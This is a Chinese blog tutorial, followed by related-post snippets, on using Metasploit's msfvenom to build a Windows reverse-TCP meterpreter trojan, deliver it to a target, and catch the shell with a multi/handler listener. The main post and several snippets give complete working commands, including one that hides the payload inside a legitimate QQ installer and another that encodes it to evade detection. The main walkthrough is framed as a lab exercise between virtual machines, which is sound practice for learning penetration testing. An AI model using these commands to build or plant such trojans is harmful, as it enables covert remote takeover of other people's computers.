msfconsole之制作windows木马并成功获取shell

已于 2022-11-22 13:52:31 修改
阅读量3.5k 收藏 17
点赞数 2
文章标签: 安全 linux centos 网络安全 web安全
于 2022-11-22 13:51:07 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_56228347/article/details/127980946
版权

msfconsole之制作windows木马并成功获取shell


一、工具简介
    msfconsole 简称 msf 是一款常用的安全测试工具,包含了常见的漏洞利用模块和生成各种木马,其提供了一个一体化的集中控制台,通过msfconsole,你可以访问和使用所有的metaslopit插件,payload,利用模块,post模块等等。msfconsole还有第三方程序的接口,比如nmap、sqlmap等,可以直接在msfconsole里面使用。

二、复现过程
    攻击机:kali-2021-09 IP地址:192.168.227.128
    靶机:windows12-server IP地址:192.168.227.131

(1)首先打开kali终端,输入msfconsole进入msf:
在这里插入图片描述

(2)通过msfvenom生成可以在windows系统运行的exe后缀病毒:
    msfvenom -p windows/meterpreter_reverse_tcp LHOST=vps ip LPORT=12345 -f exe > win2012.exe
在这里插入图片描述

(3)在kali上利用python开启一个8080服务,将exe文件传到靶机上:(此处不做演示)
在这里插入图片描述

(4)然后回到kali机上,需要开启端口监听,先使用监听模块:Use exploit/multi/handler
在这里插入图片描述

(5)然后设置payload反弹:Set payload windows/meterpreter_reverse_tcp
在这里插入图片描述

(6)通过show options看看需要设置哪些攻击参数,required中显示为yes的则是必须设置的参数:
在这里插入图片描述
    此处需要设置监听ip和端口号,通过以下命令行:
    set LHOST 192.168.227.128(攻击者终端ip)
    set LPORT 12345(攻击者终端监听的端口)
在这里插入图片描述

(7)然后输入exploit/run开始监听:
在这里插入图片描述
    回到windows2012中,点击win2012.exe运行此木马,此时kali可以成功收到shell,进入meterpreter:
在这里插入图片描述
    此时输入shell即可进入shell控制台模式,但是我们会发现编码问题导致显示出问题:
在这里插入图片描述
    输入chcp 65001即可解决编码错误问题,显示正常:
在这里插入图片描述

网工沉破鱼
关注
  • 2
    点赞
  • 17
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
网络安全MSF生成木马教程
一直被模仿,从未被超越
03-13 1309
1、当客户端点击木马后,Kali 成功获取。2、启动Apache,方便客户端下载。1、在Kali机器上面生成木马。本例用的是 Themida。二、Kali 开启监听。2、设置Payload。
msf制作简单的windows exe木马
weixin_73942557的博客
10-25 747
msf制作Windows可执行程序木马并利用。首先利用用组件msfvenom制作木马。然后将生成的木马放到你准备的靶机上面。设置payload、监听IP和端口。在靶机上运行生成的木马文件。进入msfconsole。-p设置payload。然后设置返回IP和端口。-f设置生成木马的类型。使用exploit利用。-o设置路径和文件名。目前就已经提权成功了。
msfconsole制作windows木马成功获取shell(反向payload)
最新发布
2201_75387456的博客
05-27 507
相关命令:msfvenom -p windows/meterpreter_reverse_tcp LHOST=192.168.5.129 LPORT=7680 -f exe > win012.exe。set PAYLOAD windows/meterpreter/reverse_tcp //和上面msfvenom使用 的payload相同。set lhost 192.168.5.129 //kali的ip。需要注意这里的lhost填写的是kali的ip。3.进入msfconsole设置。
metasploit中msfconsole使用教程,永恒之蓝漏洞复现
qq_47289634的博客
03-13 2198
msfconsole是metasploit中的一个工具,msfconsole集成了很多漏洞的利用的脚本,永恒之蓝是在 Windows 发生的漏洞,这个漏洞导致攻击者在目标系统上可以执行任意代码。通过永恒之蓝漏洞会扫描开放445文件共享端口的Windows机器,无需用户任何操作,只要开机上网,不法分子就能在电脑和服务器中植入勒索软件、远程控制木马、虚拟货币挖矿机等恶意程序。
msf使用方法
weixin_47679436的博客
05-16 314
msf使用
如何使用kali中msfconsole软件生成木马shell和meterpreter类型)投放至本机进行控制???超级详细!!!
2301_77578012的博客
05-05 568
msf的使用
MSF基于JAVA的漏洞获取shell实战
永远是少年
06-13 703
今天继续给大家介绍渗透测试相关知识,本文主要内容是MSF基于JAVA的漏洞获取shell实战。 一、环境准备 二、MSF设置 三、效果检验
55.Windows漏洞利用之构建ROP链绕过DEP并获取Shell1
08-03
本文主要介绍了如何在Windows环境中利用漏洞,尤其是针对DEP(Data Execution Prevention)堆栈执行保护机制,通过构建ROP(Return-Oriented Programming)链来绕过防御,并最终获取Shell。以下是对文章内容的详细...
MSFconsole(msf渗透神器)windows平台可以 使用,亲测可用
11-27
" 这句话强调了这个Windows版本的MSFconsole在资源获取上可能较为困难,表明它对于渗透测试者和安全研究人员来说是一个宝贵的工具。 **标签解析:** - **渗透测试**:渗透测试是一种安全评估方法,通过模拟黑客攻击...
77-77.渗透测试-msfconsole漏洞利用流程上.mp4
05-10
77-77.渗透测试-msfconsole漏洞利用流程上.mp4
msfconsole
12-12
kail、ubantu的msfconsole平台的用法,如search导入,use调用等等
Msfconsole使用永恒之蓝入侵Win7并上传执行可执行文件
简介
04-30 2707
我昨天我测试了,没成功所以SSH爆破先不写了,我已经把永恒之蓝漏洞玩明白了,这回是采用实战的方式进行入侵。提示:以下是本篇文章正文内容,下面案例可供参考本文就是讲解远程控制并执行文件。
msf木马程序
热门推荐
这是笔者初学时所做的笔记,有错误的地方太多了,有些结论也只是笔者的一家之言。请自行判断
09-15 1万+
捆绑木马 这里使用的是Kali linux虚拟机 攻击机ip是192.168.0.108 靶机ip是192.168.177.134 生成木马文件 首先上传一个正常的安装包到kali里面 我这里下了一个QQ 把它上传到了root/dy/路径下 然后开始捆绑 msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.0.108 -f exe -x /root/dy/PCQQ2020.exe -o /root/dy/QQ.exe -p:指定后面的pa
MSF生成木马木马的简单使用
爱喝水的仙人树的博客
11-03 8792
本文将介绍有关MSF木马模块的简单使用方式,介绍常见的几种木马生成方式,如有不对的地方,欢迎大家在评论区指正。由于本文仅对部分模块的简单使用进行说明,更多信息请参考官方网址MSFVENOM环境配置说明1. 使用kali虚拟机和Win7(可以低于此版本)虚拟机2. kali虚拟机建议使用最新版本并将系统软件更新至最新版本3. Win7虚拟机务必关闭网络防火墙,不建议使用Win7及以上版本系统,简单的木马会被直接删除4. 查看两台虚拟机的IP地址,确保两台虚拟机之间可以ping通。
简单的木马制作并且运用
m0_46317658的博客
01-13 4970
msfvenom是msfpayload,msfencode的结合体,可利用msfvenom生成木马程序并在目标主机上执行在本地监听上线。 实验环境:kali和windows7 在kali终端中进行: 一: msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp lhost=ip lport=4444 -b"\x00" -e x86/shikata_ga_nai -i 10 -f exe -o /var/www/h
怎么做一个木马
wuli1024的博客
01-27 2768
木马恶意软件,打开时似乎是用户打开的合法文件,例如打开图像或文档或播放媒体文件,但在后台,它会运行一些邪恶的进程,例如有人可能通过后门或注入一些其他有害代码。
msfconsole的简单使用
m0_53603468的博客
12-30 8563
文章目录前言一、入侵步骤二、msfconsole常用命令总结 前言 Metasploit Framework 是非常优秀的开源渗透测试框架。 Metasploit 渗透测试框架(MSF3.4)包含3功能模块:msfconsolemsfwebmsfupdate。msfupdate用于软件更新,建议使用前先进行更新,可以更新最新的漏洞库和利用代码。msfconsole 是整个框架中最受欢迎的模块,个人感觉也是功能强大的模块,所有的功能都可以该模块下运行。msfweb 是Metasploit framew.
Metasploit和Cobalt Strike生成木马的过程
03-25
1. Metasploit生成木马的过程 Metasploit是一个常用的网络安全工具,它可以帮助渗透测试人员和安全研究人员生成各种漏洞利用和后门程序。以下是使用Metasploit生成木马的一般过程: 步骤1:启动Metasploit控制台并选择木马生成模块 Metasploit控制台提供了各种服务和模块,可以生成不同类型的木马程序。要使用Metasploit生成木马,需要首先启动控制台,然后选择木马生成模块。可以使用“msfconsole”命令启动控制台,然后使用“search”命令搜索木马生成模块。 步骤2:配置木马生成参数 选择木马生成模块后,需要配置一些参数才能生成相应的木马程序。这些参数可能包括攻击目标信息、连接方式、监听端口、处理连接的话柄等等。根据需要,可以逐一配置这些参数,然后生成木马。 步骤3:生成木马并保存 完成配置参数后,可以使用“generate”命令生成木马程序。然后,可以使用“save”命令将生成的木马保存到本地目录中。 2. Cobalt Strike生成木马的过程 Cobalt Strike是一款高级的渗透测试工具,可以帮助渗透测试人员生成各种后门程序、木马程序等。以下是使用Cobalt Strike生成木马的一般过程: 步骤1:启动Cobalt Strike客户端并选择木马生成器 启动Cobalt Strike客户端后,可以看到各种功能按钮和命令。要使用Cobalt Strike生成木马,需要选择“payload generator”按钮打开木马生成器。 步骤2:配置木马生成参数 在木马生成器界面,需要配置一些参数才能生成相应的木马程序。这些参数可能包括攻击目标信息、连接方式、监听端口、加密方式等等。根据需要,可以逐一配置这些参数,然后生成木马。 步骤3:生成木马并保存 完成参数配置后,可以使用“generate”命令生成木马程序。然后,可以使用“save”命令将生成的木马保存到本地目录中。同时,也可以选择将木马发送到受攻击者的计算机上。 总之,Metasploit和Cobalt Strike都是非常强大的网络安全工具,可以帮助渗透测试人员和安全研究人员生成各种漏洞利用和后门程序,提高安全测试和研究效率。在使用这些工具时,需要谨慎操作,避免对他人或自己造成不必要的损失。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值